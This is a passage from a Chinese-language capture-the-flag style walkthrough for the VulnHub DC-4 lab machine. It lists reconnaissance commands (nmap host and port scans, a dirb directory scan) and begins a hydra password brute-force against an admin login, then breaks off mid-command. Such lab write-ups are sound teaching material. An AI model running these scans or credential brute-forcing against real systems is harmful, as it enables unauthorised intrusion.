信息收集: 靶機(jī)地址:https://www.vulnhub.com/entry/dc-4,313/ (1)ip掃描 nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:21:17:8D' (2)端口掃描 nmap -p- -A 192.168.254.153 (3)目錄掃描 dirb http://192.168.254.153 (4)訪問80端口,發(fā)現(xiàn)一個登錄界面 (5)爆破密碼 hydra -l admin -P rockyou.txt 192.